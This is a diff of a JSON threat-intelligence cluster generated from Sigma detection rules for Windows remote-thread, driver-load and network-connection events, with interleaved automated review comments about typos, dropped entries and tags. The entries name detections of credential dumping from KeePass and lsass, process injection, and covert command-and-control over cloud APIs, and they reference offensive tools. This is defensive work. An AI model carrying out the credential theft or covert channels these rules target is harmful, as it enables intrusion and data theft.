"creation_date": "2022/04/22",
"falsepositive": [
"Unknown"
],
- "filename": "create_remote_thread_win_password_dumper_keepass.yml",
+ "filename": "create_remote_thread_win_keepass.yml",
"level": "high",
"logsource.category": "create_remote_thread",
"logsource.product": "windows",
"refs": [
- "https://github.com/GhostPack/KeeThief",
"https://www.cisa.gov/uscert/ncas/alerts/aa20-259a",
"https://github.com/denandz/KeeFarce",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml"
+ "https://github.com/GhostPack/KeeThief",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml"
],
"tags": [
"attack.credential_access",
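Review bot: the rewritten KeePass description has a grammar slip, "which could indicates potential password dumping activity" should read "which could indicate potential password dumping activity"; since this text is generated from the upstream Sigma rule, the fix belongs upstream. Separately, the "Bumblebee Remote Thread Creation" entry (uuid `994cac2b-92c2-44bf-8853-14f6ca39fbda`) is removed here and, unlike the other removed create_remote_thread entries, is not re-added under a new filename anywhere in this diff; if it was deprecated upstream, the commit message should say so, because consumers pinning that uuid will silently lose the rule.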
@@ -32627,66 +32281,7 @@
}
],
"uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a",
- "value": "KeePass Password Dumping"
- },
- {
- "description": "Detects remote thread creation from CACTUSTORCH as described in references.",
- "meta": {
- "author": "@SBousseaden (detection), Thomas Patzke (rule)",
- "creation_date": "2019/02/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_cactustorch.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/mdsecactivebreach/CACTUSTORCH",
- "https://twitter.com/SBousseaden/status/1090588499517079552",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1055.012",
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007",
- "attack.t1218.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40",
- "value": "CACTUSTORCH Remote Thread Creation"
+ "value": "Remote Thread Created In KeePass.EXE"
},
{
"description": "Detects the creation of a remote thread from a Powershell process to another process",
@@ -32696,13 +32291,13 @@
"falsepositive": [
"Unknown"
],
- "filename": "create_remote_thread_win_powershell_crt.yml",
+ "filename": "create_remote_thread_win_powershell_generic.yml",
"level": "medium",
"logsource.category": "create_remote_thread",
"logsource.product": "windows",
"refs": [
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_crt.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_generic.yml"
],
"tags": [
"attack.execution",
@@ -32722,60 +32317,38 @@
"value": "Remote Thread Creation Via PowerShell"
},
{
- "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n",
+ "description": "Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons",
"meta": {
- "author": "Perez Diego (@darkquassar), oscd.community",
- "creation_date": "2019/10/27",
+ "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community",
+ "creation_date": "2018/11/30",
"falsepositive": [
"Unknown"
],
- "filename": "create_remote_thread_win_susp_remote_thread_source.yml",
+ "filename": "create_remote_thread_win_hktl_cobaltstrike.yml",
"level": "high",
"logsource.category": "create_remote_thread",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io",
- "Personal research, statistical analysis",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml"
+ "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f",
+ "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml"
],
"tags": [
- "attack.privilege_escalation",
"attack.defense_evasion",
- "attack.t1055"
+ "attack.t1055.001"
]
},
"related": [
{
- "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119",
- "value": "Suspicious Remote Thread Source"
- },
- {
- "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/08/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_susp_remote_thread_target.yml",
- "level": "medium",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "f016c716-754a-467f-a39e-63c06f773987",
- "value": "Suspicious Remote Thread Target"
+ "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42",
+ "value": "HackTool - Potential CobaltStrike Process Injection"
},
{
"description": "Detects a remote thread creation of Ttdinject.exe used as proxy",
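Review bot: the Cobalt Strike description still says "remote threat creation" where "remote thread creation" is meant; the typo was present in the removed version too and is carried over, so it needs fixing in the upstream rule. This hunk also deletes "Suspicious Remote Thread Target" (uuid `f016c716-754a-467f-a39e-63c06f773987`) outright with no re-add visible elsewhere in the diff, and that entry was one of the ones emitting `"tags": "No established tags"` as a string; worth confirming the deletion is intentional and not a side effect of the generator dropping entries without tags.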
@@ -32843,6 +32416,133 @@
"uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee",
"value": "CreateRemoteThread API and LoadLibrary"
},
+ {
+ "description": "Detects uncommon processes creating remote threads",
+ "meta": {
+ "author": "Perez Diego (@darkquassar), oscd.community",
+ "creation_date": "2019/10/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "create_remote_thread_win_uncommon_source_image.yml",
+ "level": "high",
+ "logsource.category": "create_remote_thread",
+ "logsource.product": "windows",
+ "refs": [
+ "Personal research, statistical analysis",
+ "https://lolbas-project.github.io",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.defense_evasion",
+ "attack.t1055"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119",
+ "value": "Remote Thread Creation By Uncommon Source Image"
+ },
+ {
+ "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"",
+ "meta": {
+ "author": "oscd.community, Natalia Shornikova",
+ "creation_date": "2020/10/06",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "create_remote_thread_win_powershell_lsass.yml",
+ "level": "high",
+ "logsource.category": "create_remote_thread",
+ "logsource.product": "windows",
+ "refs": [
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f",
+ "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread"
+ },
+ {
+ "description": "Detects remote thread creation from CACTUSTORCH as described in references.",
+ "meta": {
+ "author": "@SBousseaden (detection), Thomas Patzke (rule)",
+ "creation_date": "2019/02/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "create_remote_thread_win_hktl_cactustorch.yml",
+ "level": "high",
+ "logsource.category": "create_remote_thread",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/mdsecactivebreach/CACTUSTORCH",
+ "https://twitter.com/SBousseaden/status/1090588499517079552",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1055.012",
+ "attack.t1059.005",
+ "attack.t1059.007",
+ "attack.t1218.005"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40",
+ "value": "HackTool - CACTUSTORCH Remote Thread Creation"
+ },
{
"description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.",
"meta": {
@@ -32963,11 +32663,11 @@
"logsource.category": "driver_load",
"logsource.product": "windows",
"refs": [
- "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
"https://github.com/fengjixuchui/gdrv-loader",
- "https://twitter.com/malmoeb/status/1551449425842786306",
"https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details",
+ "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
"https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details",
+ "https://twitter.com/malmoeb/status/1551449425842786306",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml"
],
"tags": [
@@ -33142,8 +32842,8 @@
"logsource.category": "driver_load",
"logsource.product": "windows",
"refs": [
- "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
"https://reqrypt.org/windivert-doc.html",
+ "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml"
],
"tags": [
@@ -33343,14 +33043,13 @@
"logsource.category": "driver_load",
"logsource.product": "windows",
"refs": [
- "https://processhacker.sourceforge.io/",
"https://github.com/winsiderss/systeminformer",
+ "https://processhacker.sourceforge.io/",
"https://systeminformer.sourceforge.io/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml"
],
"tags": [
"attack.privilege_escalation",
- "cve.2021.21551",
"attack.t1543"
]
},
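Review bot: the only substantive change in this hunk is dropping the `cve.2021.21551` tag from the Process Hacker driver entry; none of the remaining refs (systeminformer, processhacker.sourceforge.io) mention that CVE, so the removal reads as cleanup of a tag the refs did not support, but because CVE tags are often used for filtering, the commit message should state explicitly that the tag was removed on purpose and why.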
@@ -33413,8 +33112,8 @@
"logsource.category": "driver_load",
"logsource.product": "windows",
"refs": [
- "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities",
"https://github.com/alfarom256/CVE-2022-3699/",
+ "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml"
],
"tags": [
@@ -33549,8 +33248,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/",
"https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf",
+ "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml"
],
"tags": [
@@ -33572,6 +33271,41 @@
"uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b",
"value": "Notepad Making Network Connection"
},
+ {
+ "description": "Detects a \"winlogon.exe\" process that initiate network communications with public IP addresses",
+ "meta": {
+ "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io",
+ "creation_date": "2023/04/28",
+ "falsepositive": [
+ "Communication to other corporate systems that use IP addresses from public address spaces"
+ ],
+ "filename": "net_connection_win_winlogon_net_connections.yml",
+ "level": "medium",
+ "logsource.category": "network_connection",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.command_and_control",
+ "attack.t1218.011"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7610a4ea-c06d-495f-a2ac-0a696abcfd3b",
+ "value": "Outbound Network Connection To Public IP Via Winlogon"
+ },
{
"description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.",
"meta": {
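Review bot: the new winlogon entry's description has a subject-verb mismatch, "a \"winlogon.exe\" process that initiate network communications" should be "initiates". The tag set also deserves a second look: it carries three tactics (`defense_evasion`, `execution`, `command_and_control`) but only one technique, `attack.t1218.011`, and the single `related` entry maps that technique alone, so two of the three tactic tags have no technique backing them in this entry.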
@@ -33585,9 +33319,9 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
- "https://content.fireeye.com/apt-41/rpt-apt41",
"https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html",
+ "https://content.fireeye.com/apt-41/rpt-apt41",
+ "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml"
],
"tags": [
@@ -33684,8 +33418,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
"https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md",
+ "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml"
],
"tags": [
@@ -33785,8 +33519,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/",
+ "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"
],
"tags": [
@@ -33913,8 +33647,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling",
"https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
+ "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml"
],
"tags": [
@@ -33992,8 +33726,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.ietf.org/rfc/rfc2821.txt",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp",
+ "https://www.ietf.org/rfc/rfc2821.txt",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml"
],
"tags": [
@@ -34027,11 +33761,11 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
- "https://twitter.com/M_haggis/status/1032799638213066752",
"https://twitter.com/M_haggis/status/900741347035889665",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1",
+ "https://twitter.com/M_haggis/status/1032799638213066752",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml"
],
"tags": [
@@ -34136,6 +33870,7 @@
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml"
],
"tags": [
+ "attack.persistence",
"attack.command_and_control",
"attack.t1571"
]
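Review bot: `attack.persistence` is added to the backconnect-ports entry without any accompanying technique tag; the only technique present, `attack.t1571`, sits under command_and_control, so the new tactic tag has nothing in the entry to justify it. If the upstream rule gained a persistence technique, that tag should appear here as well; otherwise the tactic tag should be dropped.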
@@ -34165,8 +33900,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.poolwatch.io/coin/monero",
"https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt",
+ "https://www.poolwatch.io/coin/monero",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining_pools.yml"
],
"tags": [
@@ -34276,6 +34011,43 @@
"uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23",
"value": "Outbound RDP Connections Over Non-Standard Tools"
},
+ {
+ "description": "Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)",
+ "meta": {
+ "author": "Gavin Knapp",
+ "creation_date": "2023/05/01",
+ "falsepositive": [
+ "Legitimate applications communicating with the \"googleapis.com\" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning."
+ ],
+ "filename": "net_connection_win_google_api_non_browser_access.yml",
+ "level": "medium",
+ "logsource.category": "network_connection",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/looCiprian/GC2-sheet",
+ "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/",
+ "https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/",
+ "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf",
+ "https://youtu.be/n2dFlSaBBKo",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_google_api_non_browser_access.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1102"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7e9cf7b6-e827-11ed-a05b-0242ac120003",
+ "value": "Suspicious Non-Browser Network Communication With Google API"
+ },
{
"description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.",
"meta": {
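Review bot: the `falsepositive` text in this new entry reads "This is environmental dependent", which should be "environment dependent"; as the JSON is generated from the Sigma rule, the wording needs to be corrected in the upstream `net_connection_win_google_api_non_browser_access.yml` rather than patched in this cluster. The `related` mapping to dest-uuid 830c9528-df21-472c-8c14-a036bf17d665 is consistent with the single `attack.t1102` tag.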
@@ -34440,8 +34212,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/",
"https://ngrok.com/",
+ "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml"
],
"tags": [
@@ -34474,9 +34246,9 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/kleiton0x7e/status/1600567316810551296",
- "https://github.com/kleiton0x00/RedditC2",
"https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al",
+ "https://github.com/kleiton0x00/RedditC2",
+ "https://twitter.com/kleiton0x7e/status/1600567316810551296",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_reddit_api_non_browser_access.yml"
],
"tags": [
@@ -34496,6 +34268,40 @@
"uuid": "d7b09985-95a3-44be-8450-b6eadf49833e",
"value": "Suspicious Non-Browser Network Communication With Reddit API"
},
+ {
+ "description": "Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as \"OffensiveNotion C2\"",
+ "meta": {
+ "author": "Gavin Knapp",
+ "creation_date": "2023/05/03",
+ "falsepositive": [
+ "Legitimate applications communicating with the \"api.notion.com\" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured."
+ ],
+ "filename": "net_connection_win_notion_api_susp_communication.yml",
+ "level": "low",
+ "logsource.category": "network_connection",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/mttaggart/OffensiveNotion",
+ "https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notion_api_susp_communication.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1102"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7e9cf7b6-e827-11ed-a05b-15959c120003",
+ "value": "Potentially Suspicious Network Connection To Notion API"
+ },
{
"description": "Use IMEWDBLD.exe (built-in to windows) to download a file",
"meta": {
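Review bot: the uuid `7e9cf7b6-e827-11ed-a05b-15959c120003` differs from the Google API entry's `7e9cf7b6-e827-11ed-a05b-0242ac120003` only in the last group, which suggests one UUID was generated and the other derived by hand. They are distinct, so there is no collision in this patch, but please confirm both values match the `id` fields of the upstream Sigma rules, since a hand-edited UUID that diverges from the source will break the mapping on the next regeneration.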
@@ -34619,8 +34425,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/",
"https://twitter.com/forensicitguy/status/1513538712986079238",
+ "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml"
],
"tags": [
@@ -34640,6 +34446,41 @@
"uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583",
"value": "Equation Editor Network Connection"
},
+ {
+ "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.",
+ "meta": {
+ "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/24",
+ "falsepositive": [
+ "Legitimate use of the external websites for troubleshooting or network monitoring"
+ ],
+ "filename": "net_connection_win_susp_external_ip_lookup.yml",
+ "level": "medium",
+ "logsource.category": "network_connection",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_external_ip_lookup.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1016"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "edf3485d-dac4-4d50-90e4-b0e5813f7e60",
+ "value": "Suspicious Network Connection to IP Lookup Service APIs"
+ },
{
"description": "Detects an executable that isn't dropbox but communicates with the Dropbox API",
"meta": {
@@ -34653,8 +34494,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb",
"https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
+ "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml"
],
"tags": "No established tags"
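Review bot: the unchanged context line `"tags": "No established tags"` stores a string where every other entry in this file uses an array; any consumer that iterates `tags` will fail on this entry. Not introduced by this patch, but since the generator is being touched, emitting `[]` for rules without tags would make the schema uniform.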
@@ -34675,8 +34516,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://megatools.megous.com/",
"https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://megatools.megous.com/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml"
],
"tags": [
@@ -34696,29 +34537,6 @@
"uuid": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4",
"value": "Communication To Mega.nz"
},
- {
- "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml",
- "level": "high",
- "logsource.category": "network_connection",
- "logsource.product": "windows",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_3cx_compromise_beaconing_activity.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "51eecf75-d069-43c7-9ea2-63f75499edd4",
- "value": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon"
- },
{
"description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n",
"meta": {
